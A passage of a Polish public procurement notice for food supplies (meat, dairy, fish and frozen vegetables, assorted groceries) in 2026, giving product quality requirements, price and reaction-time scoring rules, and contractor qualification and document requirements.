zamówienia:<br/><br/>Wymagania: <br/>Dostarczone wędliny mają być świeże bez oznak mrożenia, z ważnym terminem przydatności do spożycia, bez obcych zapachów, posmaków. Dostarczone w oryginalnych opakowaniach producenta zawierające informacje dotyczące min.: nazwy i adresu producenta, nazwy towary, jego klasy, jakości, daty produkcji, warunków przechowywania oraz innych informacji wymaganych odpowiednimi przepisami. Opakowania winny być nieuszkodzone i wykonane z materiałów przeznaczonych do kontaktu z żywością. Przetwory mięsne zawierające co najmniej 80 % mięsa, bez wypełniaczy, bez fosforanów, bez MOM<br/>Mięso świeże, nie mrożone, bez przebarwień oraz zanieczyszczeń obcych, bez oznak zepsucia, zapach charakterystyczny dla każdego rodzaju mięsa, konsystencja jędrna i elastyczna w ilościach i jakości wskazanej w opisie przedmiotu zamówienia stanowiący załącznik nr 3.3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach (ocena oferty będzie dokonywana dla każdej części osobno).<br/><br/>Kryteria oceny ofert i ich waga:<br/><br/>Cena brutto (C) – Waga: 60% (60 punktów)<br/><br/>Czas reakcji (R) – Waga: 40% (40 punktów)<br/><br/>Sposób oceny kryterium &#34;Cena brutto&#34; (C): Punkty zostaną obliczone według wzoru: C = (Cena brutto najtańszej oferty / Cena brutto badanej oferty) x 60 pkt<br/><br/>Sposób oceny kryterium &#34;Czas reakcji&#34; (R): Punkty zostaną przyznane za zadeklarowany czas reakcji (termin dostawy artykułów właściwych w przypadku dostarczenia towaru wadliwego, niezgodnego z zamówieniem), liczony od czasu zgłoszenia wady przez Zamawiającego:<br/><br/>40 punktów - dostarczanie właściwych artykułów w czasie do 1 godziny włącznie od zgłoszenia.<br/><br/>30 punktów - dostarczanie właściwych artykułów w czasie powyżej 1 godziny do 2 godzin włącznie od zgłoszenia.<br/><br/>20 punktów - dostarczanie właściwych artykułów w czasie powyżej 2 godziny do 3 godzin włącznie od zgłoszenia.<br/><br/>0 punktów - dostarczanie właściwych artykułów w czasie powyżej 3 godzin do 4 godzin włącznie od zgłoszenia.<br/><br/>Zasady dodatkowe dla kryterium &#34;Czas reakcji&#34;: * Deklarowany czas reakcji musi być wskazany w pełnych godzinach. * Jeśli Wykonawca zadeklaruje czas w niepełnych godzinach, Zamawiający zaokrągli go do kolejno wyższej pełnej godziny. <br/><br/>W przypadku niezłożenia oświadczenia o czasie reakcji (braku wpisu w formularzu ofertowym), oferta otrzyma 0 punktów, a Zamawiający uzna, że Wykonawca zaoferował maksymalny czas reakcji, tj. 4 godziny. * W przypadku zaoferowania czasu reakcji dłuższego niż maksymalny (4 godziny), oferta zostanie odrzucona. <br/><br/>Obliczenie końcowej liczby punktów (S): Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: S = C + R<br/><br/>Rozstrzyganie w przypadku ofert z taką samą liczbą punktów: * Jeżeli nie można wybrać najkorzystniejszej oferty, ponieważ dwie lub więcej ofert przedstawia taki sam bilans punktów (S), Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze (tj. w kryterium &#34;Cena brutto&#34;). * Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. * Jeżeli nie można dokonać wyboru oferty (np. ceny są identyczne), Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 – szczegółowy asortyment znajduję się w załączniku nr 3.4 do SWZ<br/><br/>Nazwa zamówienia: Nabiał<br/><br/>Wymagania: <br/>Opakowania nie mogą być uszkodzone ani zgniecione, wszelkie uszkodzenia spowodują nieprzyjęcie towaru przez zamawiającego. Cały asortyment nabiałowy powinien byś świeży, przywieziony w postaci schłodzonej w dobrych terminach ważności. Na etykietach lub opakowaniach produktów muszą być widoczne terminy przydatności do spożycia. Jakość artykułów żywnościowych nie może budzić zastrzeżeń. Produkty mleczne: jogurt, kefir, maślanka, mleko zsiadłe, mleko acidofilne, mleko smakowe, serwatka, ser twarogowy, serek homogenizowany:<br/>1)	zawierające nie więcej niż 10 g cukrów w 100 g/ml produktu gotowego do spożycia;<br/>2)	bez dodatku substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008;<br/>3)	zawierające nie więcej niż 10 g tłuszczu w 100 g/ml produktu gotowego do spożycia w ilościach i jakości wskazanej w opisie przedmiotu zamówienia stanowiący załącznik nr 3.4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach (ocena oferty będzie dokonywana dla każdej części osobno).<br/><br/>Kryteria oceny ofert i ich waga:<br/><br/>Cena brutto (C) – Waga: 60% (60 punktów)<br/><br/>Czas reakcji (R) – Waga: 40% (40 punktów)<br/><br/>Sposób oceny kryterium &#34;Cena brutto&#34; (C): Punkty zostaną obliczone według wzoru: C = (Cena brutto najtańszej oferty / Cena brutto badanej oferty) x 60 pkt<br/><br/>Sposób oceny kryterium &#34;Czas reakcji&#34; (R): Punkty zostaną przyznane za zadeklarowany czas reakcji (termin dostawy artykułów właściwych w przypadku dostarczenia towaru wadliwego, niezgodnego z zamówieniem), liczony od czasu zgłoszenia wady przez Zamawiającego:<br/><br/>40 punktów - dostarczanie właściwych artykułów w czasie do 1 godziny włącznie od zgłoszenia.<br/><br/>30 punktów - dostarczanie właściwych artykułów w czasie powyżej 1 godziny do 2 godzin włącznie od zgłoszenia.<br/><br/>20 punktów - dostarczanie właściwych artykułów w czasie powyżej 2 godziny do 3 godzin włącznie od zgłoszenia.<br/><br/>0 punktów - dostarczanie właściwych artykułów w czasie powyżej 3 godzin do 4 godzin włącznie od zgłoszenia.<br/><br/>Zasady dodatkowe dla kryterium &#34;Czas reakcji&#34;: * Deklarowany czas reakcji musi być wskazany w pełnych godzinach. * Jeśli Wykonawca zadeklaruje czas w niepełnych godzinach, Zamawiający zaokrągli go do kolejno wyższej pełnej godziny. <br/><br/>W przypadku niezłożenia oświadczenia o czasie reakcji (braku wpisu w formularzu ofertowym), oferta otrzyma 0 punktów, a Zamawiający uzna, że Wykonawca zaoferował maksymalny czas reakcji, tj. 4 godziny. * W przypadku zaoferowania czasu reakcji dłuższego niż maksymalny (4 godziny), oferta zostanie odrzucona. <br/><br/>Obliczenie końcowej liczby punktów (S): Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: S = C + R<br/><br/>Rozstrzyganie w przypadku ofert z taką samą liczbą punktów: * Jeżeli nie można wybrać najkorzystniejszej oferty, ponieważ dwie lub więcej ofert przedstawia taki sam bilans punktów (S), Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze (tj. w kryterium &#34;Cena brutto&#34;). * Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. * Jeżeli nie można dokonać wyboru oferty (np. ceny są identyczne), Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 – szczegółowy asortyment znajduję się w załączniku nr 3.5 do SWZ<br/><br/>Nazwa zamówienia: Ryby przetworzone, Przetworzone warzywa i owoce – mrożonki<br/><br/><br/><br/>Krótki opis przedmiotu zamówienia:<br/><br/>Wymagania: <br/>Bez obcych zapachów, nieoblodzone, niezlepione, sypkie, nieuszkodzone mechanicznie. Jakość dostarczonych towarów nie może budzić zastrzeżeń. Towar w oryginalnych opakowaniach producenta, opakowania całe nienaruszone. Barwa zgodna z naturalną, brak ubytków i uszkodzeń mechanicznych. Termin przydatności do spożycia na opakowaniu. Opakowania jednostkowe oraz zbiorowe, powinny być oznakowane i zawierać informacje dotyczące m.in.: nazwy i adresu producenta, nazwy dystrybutora, nazwy towaru, jego klasy jakościowej, daty produkcji, terminu przydatności do spożycia. Opakowania powinny być wykonane z materiałów przeznaczonych do kontaktu z żywnością w ilościach i jakości wskazanej w opisie przedmiotu zamówienia stanowiący załącznik nr 3.5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15200000-0 - Ryby przetworzone i konserwowane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach (ocena oferty będzie dokonywana dla każdej części osobno).<br/><br/>Kryteria oceny ofert i ich waga:<br/><br/>Cena brutto (C) – Waga: 60% (60 punktów)<br/><br/>Czas reakcji (R) – Waga: 40% (40 punktów)<br/><br/>Sposób oceny kryterium &#34;Cena brutto&#34; (C): Punkty zostaną obliczone według wzoru: C = (Cena brutto najtańszej oferty / Cena brutto badanej oferty) x 60 pkt<br/><br/>Sposób oceny kryterium &#34;Czas reakcji&#34; (R): Punkty zostaną przyznane za zadeklarowany czas reakcji (termin dostawy artykułów właściwych w przypadku dostarczenia towaru wadliwego, niezgodnego z zamówieniem), liczony od czasu zgłoszenia wady przez Zamawiającego:<br/><br/>40 punktów - dostarczanie właściwych artykułów w czasie do 1 godziny włącznie od zgłoszenia.<br/><br/>30 punktów - dostarczanie właściwych artykułów w czasie powyżej 1 godziny do 2 godzin włącznie od zgłoszenia.<br/><br/>20 punktów - dostarczanie właściwych artykułów w czasie powyżej 2 godziny do 3 godzin włącznie od zgłoszenia.<br/><br/>0 punktów - dostarczanie właściwych artykułów w czasie powyżej 3 godzin do 4 godzin włącznie od zgłoszenia.<br/><br/>Zasady dodatkowe dla kryterium &#34;Czas reakcji&#34;: * Deklarowany czas reakcji musi być wskazany w pełnych godzinach. * Jeśli Wykonawca zadeklaruje czas w niepełnych godzinach, Zamawiający zaokrągli go do kolejno wyższej pełnej godziny. <br/><br/>W przypadku niezłożenia oświadczenia o czasie reakcji (braku wpisu w formularzu ofertowym), oferta otrzyma 0 punktów, a Zamawiający uzna, że Wykonawca zaoferował maksymalny czas reakcji, tj. 4 godziny. * W przypadku zaoferowania czasu reakcji dłuższego niż maksymalny (4 godziny), oferta zostanie odrzucona. <br/><br/>Obliczenie końcowej liczby punktów (S): Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: S = C + R<br/><br/>Rozstrzyganie w przypadku ofert z taką samą liczbą punktów: * Jeżeli nie można wybrać najkorzystniejszej oferty, ponieważ dwie lub więcej ofert przedstawia taki sam bilans punktów (S), Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze (tj. w kryterium &#34;Cena brutto&#34;). * Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. * Jeżeli nie można dokonać wyboru oferty (np. ceny są identyczne), Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 – szczegółowy asortyment znajduję się w załączniku nr 3.6 do SWZ<br/><br/>Nazwa zamówienia: pozostałe różne art. spożywcze<br/><br/><br/><br/>Krótki opis przedmiotu zamówienia:<br/><br/>Wymagania: <br/>Dostarczony towar ma być w oryginalnych opakowaniach producenta, zawierających informacje dotyczące min.: nazwy i adresu producenta, nazwy dystrybutora nazwy towaru, jego klasy jakości, daty produkcji, terminu przydatności do spożycia ilości sztuk i warunków przechowywania oraz innych informacji wymaganych odpowiednimi przepisami. Opakowania winny być nieuszkodzone i wykonane z materiałów przeznaczonych do kontaktu z żywnością, czyste bez oznak zawilgocenia, zapleśnienia, obecności szkodników, szczelne. Oferowane artykuły żywnościowe, produkty zbożowe, artykuły sypkie nie mogą być zabrylowane i zawilgocone. Nie mogą zawierać szkodników i posiadać obcego zapachu.<br/>Miód o łagodnym, woskowym zapachu, w stanie płynnym, preferowany kolor żółty. <br/>Soki owocowe, warzywne, owocowo -warzywne, napoje bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008. <br/>Ketchup, w przypadku którego zużyto nie mniej niż 120 g pomidorów do przygotowania 100 g produktu, zawierający gotowego do spożycia, zawierający 15 g cukru w 100 g produktu gotowego do spożycia. <br/>0lej roślinny rafinowany o zawartości kwasów jednonienasyconych powyżej 50% i zawartości kwasów wielonienasyconych poniżej 40%. <br/>Soki owocowe, warzywne, musy owocowo-warzywne:<br/>- o niskiej zawartości sodu/soli, tj., zawierające nie więcej niż 0,12 g sodu lub równoważnej ilości soli na 100 g lub na l00 ml środka spożywczego lub o obniżonej zawartości sodu/soli, tj. obniżenie zawartości sodu lub wartości równoważnej dla soli wynosi co najmniej 25% w porównaniu z podobnym produktem.<br/>Przyprawa warzywna do potraw opakowanie 300 g Skład: Sól morska, suszone warzywa 32% (marchew, pasternak, cebula, ziemniaki, seler, pomidory, por, papryka, natka pietruszki), cukier, lubczyk, pieprz czarny, kurkuma, czosnek, koper. Nie zawiera glutenu.<br/>Przeciery, musy owocowe, warzywne oraz owocowo-warzywne:<br/>-bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008;<br/>-bez dodatku soli<br/>- 100% owoców i warzyw<br/>Majonez bez substancji konserwujących, o dobrym składzie - olej rzepakowy rafinowany, musztarda woda, ocet, gorczyca, cukier, sól, przyprawy, woda, żółtka jaj kurzych (7,0%), nie uszkodzone mechanicznie<br/>Makaron 100% pszenicy durum i ryż paraboliczny - nie rozgotowujący się. <br/>Przyprawy aromatyczne, bez obcych zapachów, sypkie, bez dodatku soli/sodu, cukru i substancji słodzących, opakowanie od 15g – 30g. Przyprawy bez dodatku glutaminianu sodu. -<br/>Płatki i artykuły wielozbożowy zaw. cukru poniżej 29g/100g produktu, struktura i konsystencja sypka.<br/>Zbożowe produkty śniadaniowe oraz inne produkty zbożowe:<br/>-bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008;<br/>-o niskiej zawartości sodu/soli, tj. zawierające nie więcej niż 0,12 g sodu lub równoważnej ilości soli na 100 g lub na l00 ml środka spożywczego lub o obniżonej zawartości sodu/soli, tj. obniżenie zawartości sodu lub wartości równoważnej dla soli wynosi co najmniej 25% w porównaniu z podobnym produktem. <br/>Jajka czyste i nie uszkodzone.<br/>Wszystkie produkty w ilościach i jakości wskazanej w opisie przedmiotu zamówienia stanowiący załącznik nr 3.6 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach (ocena oferty będzie dokonywana dla każdej części osobno).<br/><br/>Kryteria oceny ofert i ich waga:<br/><br/>Cena brutto (C) – Waga: 60% (60 punktów)<br/><br/>Czas reakcji (R) – Waga: 40% (40 punktów)<br/><br/>Sposób oceny kryterium &#34;Cena brutto&#34; (C): Punkty zostaną obliczone według wzoru: C = (Cena brutto najtańszej oferty / Cena brutto badanej oferty) x 60 pkt<br/><br/>Sposób oceny kryterium &#34;Czas reakcji&#34; (R): Punkty zostaną przyznane za zadeklarowany czas reakcji (termin dostawy artykułów właściwych w przypadku dostarczenia towaru wadliwego, niezgodnego z zamówieniem), liczony od czasu zgłoszenia wady przez Zamawiającego:<br/><br/>40 punktów - dostarczanie właściwych artykułów w czasie do 1 godziny włącznie od zgłoszenia.<br/><br/>30 punktów - dostarczanie właściwych artykułów w czasie powyżej 1 godziny do 2 godzin włącznie od zgłoszenia.<br/><br/>20 punktów - dostarczanie właściwych artykułów w czasie powyżej 2 godziny do 3 godzin włącznie od zgłoszenia.<br/><br/>0 punktów - dostarczanie właściwych artykułów w czasie powyżej 3 godzin do 4 godzin włącznie od zgłoszenia.<br/><br/>Zasady dodatkowe dla kryterium &#34;Czas reakcji&#34;: * Deklarowany czas reakcji musi być wskazany w pełnych godzinach. * Jeśli Wykonawca zadeklaruje czas w niepełnych godzinach, Zamawiający zaokrągli go do kolejno wyższej pełnej godziny. <br/><br/>W przypadku niezłożenia oświadczenia o czasie reakcji (braku wpisu w formularzu ofertowym), oferta otrzyma 0 punktów, a Zamawiający uzna, że Wykonawca zaoferował maksymalny czas reakcji, tj. 4 godziny. * W przypadku zaoferowania czasu reakcji dłuższego niż maksymalny (4 godziny), oferta zostanie odrzucona. <br/><br/>Obliczenie końcowej liczby punktów (S): Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: S = C + R<br/><br/>Rozstrzyganie w przypadku ofert z taką samą liczbą punktów: * Jeżeli nie można wybrać najkorzystniejszej oferty, ponieważ dwie lub więcej ofert przedstawia taki sam bilans punktów (S), Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze (tj. w kryterium &#34;Cena brutto&#34;). * Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. * Jeżeli nie można dokonać wyboru oferty (np. ceny są identyczne), Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące, określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/><br/>1. Zdolności do występowania w obrocie gospodarczym: <br/><br/>Opis warunku: Wykonawca spełnia warunek, jeśli wykaże, że prowadząc działalność gospodarczą lub zawodową jest wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, jeżeli taki wpis jest wymagany przepisami.<br/><br/>2. Sytuacji ekonomicznej lub finansowej: <br/><br/>Opis warunku: Zamawiający nie stawia w tym zakresie warunku.<br/><br/>3. Zdolności technicznej lub zawodowej: <br/><br/>Opis warunku: Zamawiający nie stawia w tym zakresie warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wstępne (składane wraz z ofertą): Wykonawca jest zobowiązany dołączyć do oferty aktualne na dzień składania ofert oświadczenie w zakresie wskazanym w Załączniku nr 3 do SWZ . Oświadczenie to stanowi wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu .<br/><br/>2. Podmiotowe środki dowodowe (składane na wezwanie Zamawiającego): Zamawiający, na podstawie art. 274 ust. 1 ustawy Pzp, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni) następującego podmiotowego środka dowodowego, aktualnego na dzień złożenia:<br/><br/>Odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzony nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji .<br/><br/>Zamawiający nie wzywa do złożenia ww. dokumentu, jeżeli może go uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych (o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów) .<br/><br/>3. Dotyczy podmiotów udostępniających zasoby (jeśli dotyczy): W przypadku polegania na zasobach innych podmiotów, Wykonawca składa wraz z ofertą oświadczenie tego podmiotu (Załącznik nr 4 do SWZ), potwierdzające brak podstaw wykluczenia . Zamawiający może żądać od Wykonawcy przedstawienia odpisu lub informacji z KRS/CEIDG dotyczących tego podmiotu na takich samych zasadach, jak od Wykonawcy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie żąda złożenia podmiotowych środków dowodowych w celu potwierdzenia spełniania warunków udziału w postępowaniu.<br/><br/>Potwierdzenie spełniania warunków udziału w postępowaniu następuje na podstawie oświadczenia wstępnego, o którym mowa w art. 125 ust. 1 ustawy Pzp (Załącznik nr 3 do SWZ). <br/><br/>Zamawiający samodzielnie zweryfikuje spełnianie warunku udziału w postępowaniu (zdolność do występowania w obrocie gospodarczym) na podstawie danych z ogólnodostępnych i bezpłatnych baz danych (KRS/CEIDG), zgodnie z art. 128 ust. 1 ustawy Pzp oraz zapisami Rozdziału XVI pkt 7 SWZ .</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych.<br/><br/>Potwierdzenie, że oferowane dostawy spełniają wymagania określone przez Zamawiającego, następuje na podstawie oświadczenia Wykonawcy zawartego w formularzu ofertowym (Załącznik nr 1 do SWZ) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć następujące oświadczenia i dokumenty:<br/><br/>1. Formularz Ofertowy – sporządzony na wzorze stanowiącym Załącznik nr 1 do SWZ. 2. Załącznik cenowy – wypełniony formularz cenowy dla części, na którą składana jest oferta (zgodnie z Załącznikami 3.1 – 3.6 do SWZ).<br/><br/><br/>Oraz, jeżeli dotyczy (w przypadkach określonych w SWZ):<br/><br/>3. Zobowiązanie podmiotu udostępniającego zasoby – sporządzone na wzorze stanowiącym Załącznik nr 5 do SWZ (w przypadku polegania na zasobach innego podmiotu). 4. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia – sporządzone na wzorze stanowiącym Załącznik nr 6 do SWZ (w przypadku składania oferty przez konsorcjum). 5. Pełnomocnictwo – dokument potwierdzający umocowanie do reprezentowania Wykonawcy (np. pełnomocnictwo), o ile umocowanie to nie wynika z dokumentów rejestrowych (KRS/CEIDG). 